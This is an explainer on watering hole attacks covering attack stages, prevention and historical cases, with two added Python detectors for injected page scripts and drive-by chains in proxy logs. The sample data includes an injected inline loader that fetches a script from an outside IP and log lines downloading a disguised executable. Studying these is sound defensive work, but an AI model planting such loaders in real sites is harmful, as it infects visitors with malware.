Watering Hole Attacks - Explained

Watering hole attacks are a type of cyber-attack which targets a specific group of users by infecting websites that they frequently visit. The name "watering hole" comes from the idea that predators in the wild will wait near a watering hole to prey on animals that come to drink. In a similar way, attackers wait for their victims to visit infected websites in order to infect their devices with malware or steal sensitive information.

Mar 30, 2023 - 17:01

Watering hole attacks are effective because they are targeted, and they take advantage of the trust that users have in the websites they visit. By infecting a website that their intended victims are likely to visit, attackers can significantly increase their chances of success. In addition, watering hole attacks are difficult to detect, as the infected website may appear to be functioning normally, and the malware may not be detected by antivirus software.

How Does It Work?

  • STEP 1: "RECONNAISSANCE"
    • Attackers identify and compromise a website that their intended victims are known to visit. They could also set up a website of their own, but a site that hosts malicious code is hard to keep alive, because it will be blocked as soon as the code is noticed. Identifying and compromising an established, trusted website is therefore the better option for the attacker.
  • STEP 2: "INFECTING THE TARGET"
    • Once they have identified a target website, attackers infect it with malware using a variety of techniques, such as exploiting vulnerabilities in the website's code or using social engineering tactics to trick website administrators into installing malware.
    • To infect a website, attackers may use:
      • Vulnerability exploits: Vulnerabilities found in a website may allow the attacker to gain access to the site's database or to serve code that executes on visitors' devices.

      • Malvertising exploits: Attackers can use malvertising to inject malicious code into legitimate advertisements that are displayed on a website. When a user clicks on the ad, they are redirected to a site that infects their device with malware.

      • Social engineering exploits: Attackers can use social engineering tactics to trick website administrators into installing malware on the site. For example, they may send a convincing email or message that appears to be from a legitimate source, such as a software vendor, and ask the administrator to download and install a malicious software update.

      • Zero-day exploits: A zero-day exploit is an exploit that targets a previously unknown vulnerability in software. These exploits are particularly dangerous because they are not yet known to the software vendor, so there is no patch or update available to fix the vulnerability.

  • STEP 3: "WAITING FOR THE VICTIMS"
    • After that, attackers sit back and wait. When a victim visits the infected website, their device becomes infected with malware, which gathers and stores information for the attackers. This malware can be used to steal sensitive information such as login credentials, financial information, or other personally identifiable information. Alternatively, the malware can be used to gain remote access to the victim's device, giving attackers full control over it.
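Whichever technique in Step 2 is used, the result on the website owner's side is the same: the served page now contains a script that was not there before. The following example, added here and not taken from the original article, shows one way a site owner can catch that. It parses two constructed HTML snapshots (a known-good baseline and the currently served page), inventories every external and inline script, and reports anything new, rating a new script from an untrusted host as high severity. The page host, the allow-list of trusted script hosts and the sample HTML are all assumptions made for the example.

```python
"""Diff the scripts on a served page against a known-good baseline.

Added example (not from the original article). The HTML snapshots,
the page host and the trusted-host allow-list are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collect external <script src> values and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.external = []      # src attribute of each <script src=...>
        self.inline = []        # body text of each <script> without src
        self._buf = None        # accumulates the body of the current inline script

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            body = "".join(self._buf).strip()
            if body:
                self.inline.append(body)
            self._buf = None


def script_inventory(html):
    """Return (external_srcs, inline_bodies) for one HTML document."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.external, parser.inline


def script_host(src, page_host):
    """Host a script is loaded from; a relative src means same-origin."""
    return urlparse(src).hostname or page_host


def audit_page(current_html, baseline_html, page_host, trusted_hosts):
    """Report scripts present now but absent from the baseline.

    Each finding is (severity, kind, detail). A new external script from a
    host outside the allow-list is 'high'; a new script from a trusted host
    is 'info' (could be a legitimate deploy, still worth a look).
    """
    cur_ext, cur_inline = script_inventory(current_html)
    base_ext, base_inline = script_inventory(baseline_html)
    findings = []
    for src in cur_ext:
        if src in base_ext:
            continue
        sev = "info" if script_host(src, page_host) in trusted_hosts else "high"
        findings.append((sev, "new-external-script", src))
    for body in cur_inline:
        if body not in base_inline:
            findings.append(("high", "new-inline-script", body[:60]))
    return findings


# --- constructed sample data (assumptions for this example) -----------------
PAGE_HOST = "portal.example.org"
TRUSTED_HOSTS = {"portal.example.org", "cdn.example-analytics.com"}

BASELINE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example-analytics.com/a.js"></script>
</head><body><h1>Member portal</h1></body></html>"""

# Same page with one injected external loader and one injected inline script.
INJECTED_HTML = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example-analytics.com/a.js"></script>
<script src="https://203.0.113.9/ld.js"></script>
</head><body><h1>Member portal</h1>
<script>var s=document.createElement('script');s.src='//203.0.113.9/l.js';document.body.appendChild(s);</script>
</body></html>"""

if __name__ == "__main__":
    for finding in audit_page(INJECTED_HTML, BASELINE_HTML, PAGE_HOST, TRUSTED_HOSTS):
        print(*finding)
```

Run on a schedule against the live site (fetched through a client that does not share cookies with the admin session), this is a cheap integrity check that catches the injected loader regardless of whether it arrived through a platform vulnerability, a stolen admin credential, or a compromised advertising tag. Keep the baseline in version control so that a legitimate deploy is an explicit, reviewed change to it.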

3 Ways to Prevent Watering Hole Attacks

  • Updating and Patching: Watering hole attacks typically take advantage of software flaws and weaknesses to breach your device, so keeping your software and browsers up to date substantially decreases the possibility of an attack. Regularly check for security patches on the software developer's website, or alternatively engage a managed IT services provider to ensure your systems remain current.
  • Monitoring Network Activity: Identifying watering hole attacks requires network security tooling. For instance, intrusion prevention systems can detect unusual and harmful network actions. Bandwidth management software can likewise monitor user behaviour and identify unusual patterns, such as large data transfers or excessive downloads, that may signify an attack.
  • Using a VPN: If attackers are able to compromise websites that are visited exclusively by you and your staff, their watering hole attacks are more likely to succeed. To make that harder, use a VPN and enable your browser's private browsing functionality to obscure your online activities.
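The "Monitoring Network Activity" point above is easier to act on with a concrete pattern in mind. A watering hole visit shows up in proxy or web-gateway logs as a chain: a request to a site staff visit every day, followed by a script or executable fetched from a host nobody has seen before, with the trusted site as the referer. The following example, added here and not part of the original article, runs that check over a few constructed proxy log lines. The log format, the trusted-site list and the sample hosts are all assumptions; the 203.0.113.0/24 addresses are documentation ranges.

```python
"""Find drive-by chains that start at a trusted site in proxy logs.

Added example (not from the original article). The log format, the
sample lines and the trusted-site list are constructed assumptions.
"""
from collections import defaultdict
from urllib.parse import urlparse

# Assumed: sites the organisation's staff legitimately visit every day.
TRUSTED_SITES = {
    "portal.example.org",
    "news.example-industry.com",
    "cdn.example-analytics.com",
}

# Content that should not normally arrive from an unknown host right after
# loading a trusted page.
RISKY_TYPES = {
    "application/javascript",
    "application/x-msdownload",
    "application/octet-stream",
}

# Constructed proxy log: time client method url referer content-type
SAMPLE_LOG = """\
10:00:01 10.1.1.5 GET https://news.example-industry.com/ - text/html
10:00:02 10.1.1.5 GET https://cdn.example-analytics.com/a.js https://news.example-industry.com/ application/javascript
10:00:02 10.1.1.5 GET https://203.0.113.9/ld.js https://news.example-industry.com/ application/javascript
10:00:04 10.1.1.5 GET https://203.0.113.9/flash_update.exe https://203.0.113.9/ld.js application/x-msdownload
10:05:10 10.1.1.8 GET https://portal.example.org/ - text/html
10:05:11 10.1.1.8 GET https://portal.example.org/static/app.js https://portal.example.org/ application/javascript
"""


def parse_line(line):
    """Split one log line into a record, or return None if malformed."""
    parts = line.split()
    if len(parts) != 6:
        return None
    time, client, method, url, referer, ctype = parts
    return {"time": time, "client": client, "method": method,
            "url": url, "referer": referer, "ctype": ctype}


def host_of(url):
    """Hostname of a URL; '' for the '-' placeholder or garbage."""
    return urlparse(url).hostname or ""


def find_driveby_chains(log_text, trusted_sites=TRUSTED_SITES):
    """Return (client, time, url, referer) for each risky fetch that is
    chained, via referer, back to a trusted site.

    Once a client has pulled risky content from an unknown host, that host
    is remembered as tainted for the client, so a follow-on download whose
    referer is the unknown host (the typical loader -> payload step) is also
    attributed to the chain.
    """
    findings = []
    tainted = defaultdict(set)   # client -> unknown hosts reached via a trusted page
    for rec in map(parse_line, log_text.splitlines()):
        if rec is None:
            continue
        fetched = host_of(rec["url"])
        if fetched in trusted_sites:
            continue                      # normal traffic to a known site
        ref_host = host_of(rec["referer"])
        chained = ref_host in trusted_sites or ref_host in tainted[rec["client"]]
        if chained and rec["ctype"] in RISKY_TYPES:
            tainted[rec["client"]].add(fetched)
            findings.append((rec["client"], rec["time"], rec["url"], rec["referer"]))
    return findings


if __name__ == "__main__":
    for client, when, url, referer in find_driveby_chains(SAMPLE_LOG):
        print(f"{when} {client} fetched {url} (referer {referer})")
```

The first-seen-host rule is deliberately crude so that it runs on a plain proxy log; in production you would feed the same logic with a proper allow-list built from historical traffic and add the user agent, so that a fetch of an "update" executable from a host first contacted a few seconds earlier stands out even when the page that started the chain is one you trust.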

Examples of Watering Hole Attacks

  1. In December 2012, the Council on Foreign Relations website was found to be infected with malware through a zero-day vulnerability in Microsoft's Internet Explorer. In this attack, the malware was only deployed to users using Internet Explorer set to English, Chinese, Japanese, Korean and Russian.[Wikipedia-1]
  2. Havex was discovered in 2013 and is one of five known malware families tailored to Industrial Control Systems (ICS) developed in the past decade. Energetic Bear began utilizing Havex in a widespread espionage campaign targeting the energy, aviation, pharmaceutical, defense, and petrochemical sectors. The campaign targeted victims primarily in the United States and Europe.[Wikipedia-2] Havex exploited supply chain and watering-hole attacks on ICS vendor software in addition to spear phishing campaigns to gain access to victim systems.[Wikipedia-3]
  3. The United States Department of Homeland Security's Computer Emergency Readiness Team (US-CERT) issued an alert in 2014 warning of an increase in watering hole attacks, particularly targeting government and energy sector websites.
  4. In 2019, cybersecurity firm ESET reported on a watering hole attack campaign that targeted several government websites in Central Asia. The attackers used a JavaScript backdoor to infect visitors with malware, which was used for espionage and data theft.
  5. In 2020, cybersecurity researchers discovered a watering hole attack campaign targeting websites related to the US elections. The campaign used a fake Adobe Flash Player update to infect visitors with malware.
  6. According to a 2021 report from cybersecurity firm Symantec, the healthcare sector was the most frequently targeted industry for watering hole attacks, accounting for 25% of all attacks observed.
  7. Another 2021 report from cybersecurity firm FireEye found that Chinese state-sponsored threat actors used watering hole attacks to target organizations in Southeast Asia, particularly those involved in technology, finance, and government sectors.
